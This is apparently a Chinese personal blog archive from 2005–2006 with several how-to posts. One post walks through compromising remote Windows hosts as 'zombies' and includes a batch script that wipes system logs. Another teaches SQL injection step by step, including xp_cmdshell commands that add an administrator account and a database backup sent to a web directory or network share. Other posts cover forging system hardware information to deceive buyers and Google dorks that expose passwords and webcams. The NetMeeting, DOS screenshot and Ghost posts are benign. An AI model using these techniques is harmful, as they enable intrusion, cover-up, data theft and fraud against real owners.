2006年05月01日

很长时间了,打算自己写篇文章, 想想还是肉鸡最熟悉, 还是写这个吧:)
一。寻找肉鸡, 工具:
流光4.71版本,pfinder2,LM’s.
首先介绍pfinder2, 这个是我个人认为目前扫单一端口最快的扫描器, 最大可开到1500 线程!我一般是开
600-1000, 打开后, 如图1:
看见了吗?出来了很多ip,这些都是开了3389 端口的,我们选定一个ip , 鼠标右键,选copy all 然后我们把这些结果保存为3389.txt。
现在要介绍另外一个独门暗器了:LM’s,这个是一个朋友在我叫他给我改了5 次文本后忍无可忍专门给我做的:),
我们打开, 如图2:

读取里选我们才保存的3389.txt,要添加的字符选默认的,然后添加, 添加完后会出来提示ok !然后保存。
现在要用到流光了, 这个不需要我介绍了, 最近出了一个4.7版本带补丁的, 我觉得不怎么好用, 还是用的4。71 版本。安装流光, 然后
把目录打开, 找到一个last.flx文件, 用记事本打开。然后将流光打开,
在辅助主机里选ipc$主机–编辑–添加,
随便复制一个才扫到的3389 的ip ,确定,然后将流光关闭。 如图3

现在我们来看last.flx。 现在它已经成为了last.txt, 里面内容也变成了这样。
如图4

把3389.txt里的ip 复制进去,注意:后面的::1也一定要带上!现在看last.txt,
如图5

好的, 关闭last.txt,打开流光, 现在看看, ipc$主机下面是不是有了很多新的主机了?
如图6好了, 叫它慢慢扫吧, 我也要伸个懒腰米西东西去了:)

估计结果出来了, 来看看。
如图7

看见了吧, 81 个结果, 不过,先别急着高兴,多乎哉?不多也! 根据本人多年对探测结果的分析(备注:多年=1 年多), 用户是root,wwwadmin,admin的基本上都是xp用户
(很多用户名是administrator密码为空的也是xp系统)
建议放弃,并向坚决不放弃的同志表示崇高的敬意!
二。加固肉鸡 工具:fport ,pskill
刚才扫到的战果, 我们现在上去视察一下看看:)
先改密码再查看有什么用户, 来路不明的删无赦。因为你可以进来别人也一样可以, 先把最容易的地方改了;)
然后进入到服务下, 危险的进程一律禁止了, 包括,massage

1。Remote Registry Services 允许远程注册表操作, 禁止了;
2。Telnet 这个不能放过:
3。Task Scheduler ,at命令。一定要禁止了

还有messenger, 记得才开始玩肉鸡的时候, 按了200多次确定才没有消息了, 唉,往事不堪回首~
现在禁止空连接 , 记得你怎么进来的吗?流光的报告里也总在提醒:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
这里,找到这个主键restrictanonymous把它改成1。
不要管理员看见你曾经来过,HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon在右边找一个键值
DontDisplayLastUserName然后改成1,如果不存在 ,你就新建立一个。
现在看看, 还有什么共享的, 通通关了, 这个不详细说了
现在用到了fport, 看有什么可疑的程序以及它的路径。
如图8

哈,真有不少可疑的东西呢, 用kill杀
然后在计算机管理—本地用户和组—用户,把除了你以外的别的远程登陆权限都取消了 ,
如图9

另外还可以修改端口, 但是说实在的, 我不赞成修改端口, 端口不一定意味着风险, 关键看你
怎么处理了。

三。日志的清除 工具:logkiller
关于日志的清除, 网上的文章真是多如牛毛,我这里只简单讲述一下。一个办法是 做批处理文件
做法是:新建一个具有如下内容的批处理文件:

  @del c:\winnt\system32\logfiles\*.*
  @del c:\winnt\system32\config\*.evt
  @del c:\winnt\system32\dtclog\*.*
  @del c:\winnt\system32\*.log
  @del c:\winnt\system32\*.txt
  @del c:\winnt\*.txt
  @del c:\winnt\*.log
  @del c:\del.bat

  把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,
表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。
还有一个办法是用logkiller, 它可以清除iis,msftp,smtp,schedule,系统等的日志,这个真是多快好省,隆重推荐,如图10

四。动态ip肉鸡的监视 工具: 20cn_ddns_clinent
以前对于动态肉鸡,也想过不少办法,什么网络神偷什么花生壳。 可是前者被杀的无处可逃后者体积太大, 在网上找过n个工具
后找到了现在这个, 体积小,还不被查杀。其实我曾在黑客基地的发过一个帖讲这个工具的用法, 可惜太花没人看的明白。:)
用法如下, 先进这里20cn.com, 注册个用户, 然后下客户端, 在上面写上你才注册的id,
如图11然后在程序自启动

那里打勾,这样程序一启动它会自动运行, 现在我们来ping 一下 它。
如图12 现在你在哪里都可以抓住你的动态肉鸡了!

好了, 快12点了,我也要睡觉觉了, 第一次写这样的东东, 不足之处请多指教!
bye了, 我的肉鸡, logoff id !

2005年06月08日
ASP漏洞全接触-入门篇

  随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。

  SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。

  但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据,是高手与“菜鸟”的根本区别。

  根据国情,国内的网站用ASP+Access或SQLServer的占70%以上,PHP+MySQ占L20%,其他的不足10%。在本文,我们从分入门、进阶至高级讲解一下ASP注入的方法及技巧,PHP注入的文章由NB联盟的另一位朋友zwell撰写,希望对安全工作者和程序员都有用处。了解ASP注入的朋友也请不要跳过入门篇,因为部分人对注入的基本判断方法还存在误区。大家准备好了吗?Lets Go…

  入 门 篇

  如果你以前没试过SQL注入的话,那么第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。

  第一节、SQL注入原理

  以下我们从一个网站www.19cn.com开始(注:本文发表前已征得该站站长同意,大部分都是真实数据)。

  在网站首页上,有名为“IE不能打开新窗口的多种解决方法”的链接,地址为http://www.19cn.com/showdetail.asp?id=49,我们在这个地址后面加上单引号’,服务器会返回下面的错误提示:

  Microsoft JET Database Engine 错误 80040e14

  字符串的语法错误 在查询表达式 ID=49 中。

  /showdetail.asp,行8

  从这个错误提示我们能看出下面几点:

  1. 网站使用的是Access数据库,通过JET引擎连接数据库,而不是通过ODBC。

  2. 程序没有判断客户端提交的数据是否符合程序要求。

  3. 该SQL语句所查询的表中有一名为ID的字段。


  从上面的例子我们可以知道,SQL注入的原理,就是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取你想到得到的资料。

ASP漏洞全接触-进阶篇

  在入门篇,我们学会了SQL注入的判断方法,但真正要拿到网站的保密内容,是远远不够的。接下来,我们就继续学习如何从数据库中获取想要获得的内容,首先,我们先看看SQL注入的一般步骤:

  第一节、SQL注入的一般步骤

  首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。

  其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:

  (A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:
  Select * from 表名 where 字段=49
  注入的参数为ID=49 And [查询条件],即是生成语句:
  Select * from 表名 where 字段=49 And [查询条件]


  (B) Class=连续剧 这类注入的参数是字符型,SQL语句原貌大致概如下:
  Select * from 表名 where 字段=’连续剧’
  注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ,即是生成语句:
  Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’

  (C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
  Select * from 表名 where 字段like ’%关键字%’
  注入的参数为keyword=’ and [查询条件] and ‘%25’=’, 即是生成语句:
  Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’

  接着,将查询条件替换成SQL语句,猜解表名,例如:

  ID=49 And (Select Count(*) from Admin)>=0

  如果页面就与ID=49的相同,说明附加条件成立,即表Admin存在,反之,即不存在(请牢记这种方法)。如此循环,直至猜到表名为止。

  表名猜出来后,将Count(*)替换成Count(字段名),用同样的原理猜解字段名。

  有人会说:这里有一些偶然的成分,如果表名起得很复杂没规律的,那根本就没得玩下去了。说得很对,这世界根本就不存在100%成功的黑客技术,苍蝇不叮无缝的蛋,无论多技术多高深的黑客,都是因为别人的程序写得不严密或使用者保密意识不够,才有得下手。

  有点跑题了,话说回来,对于SQLServer的库,还是有办法让程序告诉我们表名及字段名的,我们在高级篇中会做介绍。


  最后,在表名和列名猜解成功后,再使用SQL语句,得出字段的值,下面介绍一种最常用的方法-Ascii逐字解码法,虽然这种方法速度很慢,但肯定是可行的方法。

  我们举个例子,已知表Admin中存在username字段,首先,我们取第一条记录,测试长度:

  http://www.19cn.com/showdetail.asp?id=49 ;;and (select top 1 len(username) from Admin)>0

  先说明原理:如果top 1的username长度大于0,则条件成立;接着就是>1、>2、>3这样测试下去,一直到条件不成立为止,比如>7成立,>8不成立,就是len(username)=8

  当然没人会笨得从0,1,2,3一个个测试,怎么样才比较快就看各自发挥了。在得到username的长度后,用mid(username,N,1)截取第N位字符,再asc(mid(username,N,1))得到ASCII码,比如:

  id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

  同样也是用逐步缩小范围的方法得到第1位字符的ASCII码,注意的是英文和数字的ASCII码在1-128之间,可以用折半法加速猜解,如果写成程序测试,效率会有极大的提高。

  第二节、SQL注入常用函数

  有SQL语言基础的人,在SQL注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平,特别是一些常用的函数及命令。

  Access:asc(字符) SQLServer:unicode(字符)

  作用:返回某字符的ASCII码

  Access:chr(数字) SQLServer:nchar(数字)

  作用:与asc相反,根据ASCII码返回字符

  Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)

  作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串

  Access:abc(数字) SQLServer:abc (数字)

  作用:返回数字的绝对值(在猜解汉字的时候会用到)

  Access:A between B And C SQLServer:A between B And C

  作用:判断A是否界于B与C之间

  第三节、中文处理方法

  在注入中碰到中文字符是常有的事,有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有所了解,“中文恐惧症”很快可以克服。

  先说一点常识:

  Access中,中文的ASCII码可能会出现负数,取出该负数后用abs()取绝对值,汉字字符不变。

  SQLServer中,中文的ASCII为正数,但由于是UNICODE的双位编码,不能用函数ascii()取得ASCII码,必须用函数unicode ()返回unicode值,再用nchar函数取得对应的中文字符。

  了解了上面的两点后,是不是觉得中文猜解其实也跟英文差不多呢?除了使用的函数要注意、猜解范围大一点外,方法是没什么两样的。

ASP漏洞全接触-高级篇

  看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。

  第一节、利用系统表注入SQLServer数据库

  SQLServer是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子:

  ①http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”–

  分号;在SQLServer中表示隔开前后两句语句,–表示后面的语句为注释,所以,这句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用系统命令,于是,用net命令新建了用户名为name、密码为password的windows的帐号,接着:

  ②http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”–

  将新建的帐号name加入管理员组,不用两分钟,你已经拿到了系统最高权限!当然,这种方法只适用于用sa连接数据库的情况,否则,是没有权限调用xp_cmdshell的。

  ③http://Site/url.asp?id=1 ;;and db_name()>0

  前面有个类似的例子and user>0,作用是获取连接用户名,db_name()是另一个系统变量,返回的是连接的数据库名。

  ④http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db’;–

  这是相当狠的一招,从③拿到的数据库名,加上某些IIS出错暴露出的绝对路径,将数据库备份到Web目录下面,再用HTTP把整个数据库就完完整整的下载回来,所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候,还可以备份到网络地址的方法(如\\202.96.xx.xx\Share\1.db),但成功率不高。

  ⑤http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0

  前面说过,sysobjects是SQLServer的系统表,存储着所有的表名、视图、约束及其它对象,xtype=’U’ and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。第二、第三个表名怎么获取?还是留给我们聪明的读者思考吧。

  ⑥http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0

  从⑤拿到表名后,用object_id(‘表名’)获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4…就可以逐个获取所猜解表里面的字段名。

  以上6点是我研究SQLServer注入半年多以来的心血结晶,可以看出,对SQLServer的了解程度,直接影响着成功率及猜解速度。在我研究SQLServer注入之后,我在开发方面的水平也得到很大的提高,呵呵,也许安全与开发本来就是相辅相成的吧。

  第二节、绕过程序限制继续注入

  在入门篇提到,有很多人喜欢用’号测试注入漏洞,所以也有很多人用过滤’号的方法来“防止”注入漏洞,这也许能挡住一些入门者的攻击,但对SQL注入比较熟悉的人,还是可以利用相关的函数,达到绕过程序限制的目的。

  在“SQL注入的一般步骤”一节中,我所用的语句,都是经过我优化,让其不包含有单引号的;在“利用系统表注入SQLServer数据库”中,有些语句包含有’号,我们举个例子来看看怎么改造这些语句:

  简单的如where xtype=’U’,字符U对应的ASCII码是85,所以可以用where xtype=char(85)代替;如果字符是中文的,比如where name=’用户’,可以用where name=nchar(29992)+nchar(25143)代替。

  第三节、经验小结

  1.有些人会过滤Select、Update、Delete这些关键字,但偏偏忘记区分大小写,所以大家可以用selecT这样尝试一下。

  2.在猜不到字段名时,不妨看看网站上的登录表单,一般为了方便起见,字段名都与表单的输入框取相同的名字。

  3.特别注意:地址栏的+号传入程序后解释为空格,%2B解释为+号,%25解释为%号,具体可以参考URLEncode的相关介绍。

  4.用Get方法注入时,IIS会记录你所有的提交字符串,对Post方法做则不记录,所以能用Post的网址尽量不用Get。

  5.猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高。

  SQL注入漏洞可谓是“千里之堤,溃于蚁穴”,这种漏洞在网上极为普遍,通常是由于程序员对注入不了解,或者程序过滤不严格,或者某个参数忘记检查导致。在这里,我给大家一个函数,代替ASP中的Request函数,可以对一切的SQL注入Say NO,函数如下:

  Function SafeRequest(ParaName,ParaType)
  — 传入参数 —
  ParaName:参数名称-字符型
  ParaType:参数类型-数字型(1表示以上参数是数字,0表示以上参数为字符)

  Dim ParaValue
  ParaValue=Request(ParaName)
  If ParaType=1 then
  If not isNumeric(ParaValue) then
  Response.write "参数" & ParaName & "必须为数字型!"
  Response.end
  End if
  Else
  ParaValue=replace(ParaValue,"","")
  End if
  SafeRequest=ParaValue
  End function

2005年06月04日

在Microsoft Windows XP中使用NetMeeting

  使用 NetMeeting,您可以参与网上会议或讨论,可以在共享程序中工作,还可以在 Internet 或公司 Intranet 上共享数据、共享桌面以及传送文件。当然,也可以用音频、视频、聊天(文本)以及白板的方式与其他人交流。

启用NetMeeting

  默认情况下,不能从程序菜单中启用NetMeeting,可以通过命令行的方式启动。方法如下:
单击“开始”,选择“运行”命令,在对话框中键入“conf”并确定则可以启动NetMeeting配置向导,并可按照向导提示进行。


使用NetMeeting

  向导完成后,即可以使用NetMeeting。在地址栏中输入对方计算机的IP地址或计算机名,单击呼叫按钮,对方接受呼叫后即可开始通信



主持会议

  在NetMeeting中单击“呼叫”菜单,选择“主持会议”命令,可以在下列对话框中设置会议。

2005年05月26日

1,系统属性对应的系统文件为system32sysdm.cpl,我们先把它备份一个之后用exescope打开。

  2,在Resource>Dialog中101对应的窗体就是我们要改的。我的方法是将显示系统的几行信息隐藏再用OEM信息在相同位置代替。

  3,具体为改几个Link Window属性:将第4和第5个的Visible去掉,从第1个到3个和第6个到第9个的link Window座标分别改为(129,137);(141,163);(141,149);第六(141,177);再改下Caption="3.60 GHz, 512 MB 的内存";(141,229);(141,241);(141,253);保存后退出。

>

  4,将system32dllcachesysdm.cpl删除或改名,再将改过的sysdm.cpl代替system32下的,系统会有文件保护提示点取消即可。(KEY)

  5,在system32下创建oeminfo.ini,内容为
  [General]
  Manufacturer=计算机:
  Model=Pentium4(R) CPU 3.60GHz

  这样修改就基本完成啦,其它应用还有:修改Dxdiag中的信息(不少顾客喜欢用这个看机子配置)和显示属性中的显卡显存大小。

>

  对于win98,可用WINHEX等直接修改sysdm.cpl文件里的文本信息,其它部分信息(如显存大小,硬件设备里的光驱型号等)可在注册表修改。

  以上的这些修改如果再加点工(修改主板和显卡的BIOS信息,再配上特制的系统盘和驱动盘)则足矣以假乱真。所以,大家购机得小心啦。


2005年05月13日

第一篇 突破封锁之电子书、多媒体下载

  在搜索框上输入:
   "index of/ " inurl:lib
  再按搜索你将进入许多图书馆,并且一定能下载自己喜欢的书籍。

  在搜索框上输入:
   "index of /" cnki
  再按搜索你就可以找到许多图书馆的CNKI、VIP、超星等入口!

  在搜索框上输入:
  "index of /" ppt
  再按搜索你就可以突破网站入口下载powerpint作品!

  在搜索框上输入:
  "index of /" mp3
  再按搜索你就可以突破网站入口下载mp3、rm等影视作品!

  在搜索框上输入:
  "index of /" swf
  再按搜索你就可以突破网站入口下载flash作品!

  在搜索框上输入:
  "index of /" 要下载的软件名
  再按搜索你就可以突破网站入口下载软件!

  注意引号应是英文的!

  再透露一下,如果你输入:
  "index of /" AVI
  这样就可以下载AVI格式的视频文件了喔

  第二篇 突破封锁之看世界

  用Google看世界!!!只要你在Google里输入特殊的关键字,就可以搜到数千个摄象头的IP地址!通过他你就可以看到其所摄的实时影象!!

  在google里输入:
  inurl:"viewerframe?mode="

  随便打开一个,然后按提示装一个插件,就可以看到了!!!

  第三篇 突破封锁之Google是黑客的乐园

  三则黑客的Google搜索技巧简介

  大家都知道,Google毫无疑问是当今世界上最强大的搜索引擎。然而,在黑客手中,它也是一个秘密武器,它能搜索到一些你意想不到的信息。赛迪编者把他们进行了简单的总结不是希望您利用他去攻击别人的网站,而是利用这些技巧去在浩如烟海的网络信息中,来个大海捞针,寻找到对您有用的信息。

  如果您是一名普通网民,您可以使用黑客的技巧扩大自己的视野,提高自己的检索效率;如果您是一名网管,请您赶快看看您的网站是否做好了对下面黑客探测手段的防范措施,如果没有就赶快来个亡羊补牢,毕竟隐患胜于明火,防范胜于救灾;如果您是一名黑客,相信您早以在别的黑客站点上见过类似的方法,这篇文章对您没什么用处,这里的技巧对您是小儿科,菜鸟级!您可以节省宝贵的时间做更有意义的事情,这篇文章您不用看了,到别处去吧!
搜索URL

  比如我们提交这种形式:passwd.txt site:virtualave.net

  看到了什么?是不是觉得太不可思议了!有很多基于CGI/PHP/ASP 类型的留言板存在这种问题。有时我们得到密码甚至还是明码的!管理员或许太不负责了,或许安全防范的意识太差了,如果你是网络管理员,赶快检查一下不要让恶意攻击者捡了便宜。不要太相信DES加密,即使我们的密码经过DES 加密的密码,黑客们还是可以通过许多破解软件来搞定。

  这次我们能得到包含密码的文件。“site:virtualave.net”意思是只搜索 virutalave.net 的URL。virutalave.net是一个网络服务器提供商。

  同样,我们可以搜索一些顶级域名,比如:.net .org .jp .in .gr

  config.txt site:.jp

  admin.txt site:.tw

  搜索首页的目录

  首页是非常有用的,它会提供给你许多有用的信息。

  我们提交如下的形式:

  "Index of /admin"

  "Index of /secret"

  "Index of /cgi-bin" site:.edu

  你可以自己定义搜索的首页字符。这样就可以获得许多信息。

  搜索特定的文件类型

  比如你想指定一种文件的类型,可以提交如下形式:

  filetype:.doc site:.mil classified

  这个就是搜索军方的资料,你可以自定义搜索。

  第四篇 突破封锁之Google 的特殊功能

  1 、查询电话号码

  Google 的搜索栏中最新加入了电话号码和美国街区地址的查询信息。
  个人如想查找这些列表,只要填写姓名,城市和省份。
  如果该信息为众人所知,你就会在搜索结果页面的最上方看到搜索的电话和街区地址
  你还可以通过以下任何一种方法找到该列表:
  名字(或首位大写字母),姓,电话地区号
  名字(或首位大写字母),姓,邮递区号
  名字(或首位大写字母),姓,城市(可写州)
  名字(或首位大写字母),姓,州
  电话号码,包括区号
  名字,城市,州
  名字,邮递区号
2 、查找 PDF 文件

  现在 GOOGLE 的搜索结果中包括了 PDF 文件。尽管 PDF 文件不如 HTML 文件那么多,但他们经常具备一些其他文件不具备的高质量信息

  为了显示一个搜索结果是 PDF 文件而不是网页, PDF 文件的标题开头显示蓝色文本。

  这就是让你知道 ACRTOBAT READER 程序会启动来阅读文件

  如果你的计算机没装有该程序,计算机会指导你去能免费下载该程序的网页。

  使用 PDF 文件时,相关的网页快照会由“ TEXT VERSION ”代替,它是 PDF 文档的复制文件,该文件除去了所有格式化命令。

  如果你在没有 PDF 链接的情况下想看一系列搜索结果,只要在搜索栏中打上 -inurldf 加上你的搜索条件。

  3 、股票报价

  用 Google 查找股票和共有基金信息,只要输入一个或多个 NYSE , NASDAQ , AMEX 或
  共有基金的股票行情自动收录机的代码,也可以输入在股市开户的公司名字。

  如果 Google 识别出你查询的是股票或者共有基金,它回复的链接会直接连到高质量的金融信息提供者提供的股票和共有基金信息。

  在你搜索结果的开头显示的是你查询的股市行情自动收录器的代码。如果你要查找一家公司的名字(比如, INTEL ),请查看“股票报价”在 Google 搜索结果的金融栏里会有那个公司的主页的链接(比如, WWW.INTEL.COM )。

  Google 是以质量为基础来选择和决定金融信息提供者的,包括的因素有下载速度,用户界面及其功能。

  4 、找找谁和你链接

  有些单词如果带有冒号就会有特殊的意思。比如 link :操作员。查询 link:siteURL ,就会显示所有指向那个 URL 的网页。举例来说,链接 www.Google.com 会向你显示所有指向 GOOGLE 主页的网页。但这种方法不能与关键字查询联合使用。

  5 、查找站点

  单词 site 后面如果接上冒号就能够将你的搜索限定到某个网站。具体做法是:在 c 搜索栏中使用 site:sampledomain.com 这个语法结构。比如,在斯坦福找申请信息,输入:
  admission site:www.stanford.edu

  6 、查找字典释意

  查找字典释意的方法是在搜索栏中输入你要查询的内容。在我们根据要求找到所有的字典释意都会标有下划线,位于搜索结果的上面,点击链接你会找到字典提供者根据要求给出的相关定义。 7 、用 GOOLGE 查找地图

  想用 Google 查找街区地图,在 Google 搜索栏中输入美国街区地址,包括邮递区号或城市/州(比如 165 大学大街 PALO ALTO CA )。通常情况下,街区地址和城市的名字就足够了。

  当 Google 识别你的要求是查找地图,它会反馈给你有高质量地图提供者提供的链接,使你直接找到相关地图。我们是以质量为基础选择这些地图提供者。值得注意的是 Google 和使用的地图信息提供者没有任何关联。

2005年04月07日

 

 一、Graffix,从容应对DOS 抓图

  用Graffix 完成抓图操作一般情况下都要分成两个主要步骤:先将屏幕捕捉为ATF 格式,然后用附带的转换工具将ATF 格式转换为GIF 或者PCX 图像格式。

  1.ATF 文件的获得

  ①进入纯DOS 后,在命令行后输入“DGFX”并回车,将出现用法提示(图1),可以看到抓取热键是“C t r l + A L T+空格键”。


  小提示:从内存卸载此程序的命令是“DGFX/U”。

  ②运行需要抓图的程序,出现待抓画面后,按下热键,屏幕弹出提示(图2 ),输入文件名后按F1 键可以将画面抓取为A T F 格式,如果直接按E n t e r 键,则得到的是TXT 文本格式。


  小提示:若要抓取的程序画面本身是图形模式,则将直接得到GIF 或PCX 图像格式的文件,从而可以省略转换步骤。

  2.将ATF 转换为GIF/PCX 图像格式

  ATF 格式的图片不能被Windows 下应用程序所识别,因此我们需要将前面抓取到的ATF 格式转换为GIF 或者PCX 格式。

  ①在DOS 提示符后输入“A2B”,回车,输入ATF 文件名,之后在屏幕上会显示该ATF 文件的内容。

  ②再次按下热键“CTRL+ALT+ 空格”,会出现“SAVE IN WHICH FORMAT,GIF OR PCX(G/P)”的提示(询问你是将文件保存为GIF 还是PCX 格式),此时若按下字母G,则通过下面的步骤会将ATF 转换为GIF 格式;如按字母“P”则可得到PCX 格式。

  ③输入最终要得到的文件的主文件名并回车。现在进入软件目录看看,是不是得到所需要的GIF 或PCX 图像文件了?

  小提示:对于没有注册的Graffix 软件,在抓取到的图像顶端会有软件版权名称标志,可在图像处理软件中将它去掉。
  上面提及的Graffix 软件所抓取到的ATF 格式要经过转换才能得到常见的图像格式,确实麻烦了一点。况且它对某些DOS 中文系统支持不好,所抓取的汉字不会正确显示,因此更直接的方法是抓图后直接就创建标准的图像格式。在这方面,笔者常用P I X E L P O P 和D O S Capture。

  二、PIXELPOP,抓取GIF 格式更简捷
  PIXELPOP 可以直接将DOS 屏幕捕获为GIF 图像格式,而且所抓取到的图片中没有版权文字,你可以在其他地方直接使用而无需处理。

  首先在DOS 提示符后进入软件所在目录,运行批处理文件“PP.BAT”,屏幕上显示抓取热键和图像保存位置等信息说明(默认会在软件安装目录下生成SCREEN开头的G I F 文件,每按下热键一次就生成一个,序号从0 0 开始递增,如SCREEN00.GIF、SCREEN01. GIF 等(图3)。


  当出现要抓取的画面后,按下热键“S h i f t +PrintScreen”,即可抓取到这个画面并保存。

  小提示:如果要从内存中卸载此抓图软件,输入“PP /R”即可。

  三、DOSCAP,直接抓取为PCX 格式

  你需要将DOS 屏幕抓取为PCX 格式又不想通过转换来得到,不妨试试DOS Capture 这个软件。
  笔者的经验,使用DOS Capture 这个软件时,最好将这个软件的几个文件复制到启动软盘中,用该软盘启动系统进入D O S 环境,并在软盘上运行其主程序“DOSCAP.EXE”。

  小提示:如果直接在硬盘中使用,有可能会出现不能正确保存文件的情况(如笔者将其放在FAT32 格式的D 盘中,保存时总是提示不能写入)。

  由于软件没有注册,屏幕上会显示相关信息并随机出现一些字母按键提示,按对应的字母后弹出该软件抓图的热键说明,热键为“ALT +. ”(图4 )。


  待出现要抓取的画面后,快速按下热键,随着蜂鸣器的一声响,对应的画面就保存到了磁盘中,如果在保存位置下没有曾经抓取的PCX 图像文件,则生成的文件名为cap0001.pcx(继续抓图时,数字会自动递增改变)。

  小提示:从内存卸载D O S C a p t u r e 的命令是“Doscap unload”。

  使用DOSCapture 所抓取到的PCX 图像可以用于其他场合,不过它不能为多数Windows 程序所识别,好在现在很多看图软件(如IrfanView)支持该格式,因此可以很轻松地在Windows 下将其转化为常见的图像格式(如BM、JG、GIF 等)。

  正在为纯DOS 截图而发愁的朋友,不妨试试以上三款软件吧!

2005年03月09日

重装系统可不是一件好玩的事情:首先得端坐在电脑桌前老老实实地回答windows安装程序提出的问题,安装好了呢,也不能闲着,还得安装驱动程序、应用程序……粗略佑计,没有半天拿不下来!可能有朋友会说,用Ghost,既快又方便,不出五分钟,系统就恢复了,不过那只是本机备份,如果拿到别人的机器上去恢复,肯定会“水土不服”,道理很简单:硬件、系统、网络的配置不可能都千篇一律……不过看完本文以后,你就可以轻松打造出一把万能钥匙了,随便什么机器,都可以轻松采用Ghost恢复安装的方法,10多分钟就能搞Windows XP的安装!

  一、做好准备工作

  安装好Windows XP并且利用Windows Update升级最新的系统补丁(包括service Pack l和其他最新的Hot fix)。同时安装好所需的应用程序,不过不要贪多,因为将应用程序安装在 C 盘里并不是值得推荐的做法,同时会造成Ghost映像文件的容量过大。

  二、为Windows XP减肥

  不管是否需要将最后产生的Ghost映像文件刻录到光盘上,都应该对Windows XP进行减肥,以尽可能地减小Ghost映像文件的容量。可以删减的主要项目如下:

  1.系统文件保护缓存

  它位于C:WINDOWSSystem32Dllcache目录下,我们只需在命令提示符窗口中运行“sfe . exe/purgecache”即可将它删除。

  2.清空页面文件

  在“我的电脑”上单击鼠标右键,选择“属性”。在打开的“系统属性”对话框中选择“高级”选项卡,单击“性能”下的“设置”按钮,在打开的“性能选项”对话框中选择“高级”选项卡,再单击右下角的“更改”按钮,打开“虚拟内存”对话框。默认情况下虚拟内存文件保存在Windows XP的安装目录下,我们只需选择下面的“无分页文件”选项,再单击“设置”按钮即可。重新启动计算机后虚拟内存文件即被删除。注意做好硬盘映像文件后,再重设虚拟内存。

  3.关闭系统还原功能

  在打开的“系统属性”对话框中选择“系统还原”选项卡,选中“在所有驱动器上关闭系统还原”前的复选框即可。

  4.其他方法

  我们还可以采用其他的如删除帮助文档、删除不需要的输人法、字体文件等常规“减肥”方法来进一步减小Windows XP所在分区的大小。


  三、对驱动程序做手术

  由于我们要制作的是一个万能的Windows XP Ghost文件,目标计算机上的硬件配置和当前计算机的配置肯定不完全相同,因此我们要将当前计算机上的设备驱动程序删除。

  1. 删除普通驱动程序

   在“运行”对话框里输人“devmgrnt.rnsc”并回车,打开“设备管理器”控制台窗口。

   找到网络适配器,鼠标右键单击其下的网卡设备名称,在弹出菜单上单击“卸载”菜单项。

   再用类似的方法卸载通用串行总线控制器、视频游戏控制器、显卡、声卡等设备驱动程序。这里要注意的是,如果系统提示需要重新启动,一定不要重启机器,以免系统自作主张,重新安装驱动程序。

  2. 更新ACPI属性

  然后我们要把计算机的ACPI属性更改为Standard PC,这是因为如果目标计算机中有不同类型的ACPI,则新克隆的目标计算机就无法实现电脑软关机,并且可能会在第一次启动后崩溃!更改步骤如下:

   在设备管理器控制台窗口用鼠标右键单击“计算机”→“ACPI Uniprocessor PC”,在弹出菜单上单击“更新驱动程序”菜单项;

   在打开的“硬件更新向导”对话框里选中“从列表或指定位置安装(高级)”选项,并单击“下一步”按钮;

   在接下来的页面里选中“不要搜索,我要自己选择要安装的驱动程序”选项,并单击“下一步”按钮;

   然后选择“Standsrd PC”选项,并根据屏幕提示一路Next, 只是最后提示是否重新启动时,一定不要重启!

  3. 更新IDE控制器属性

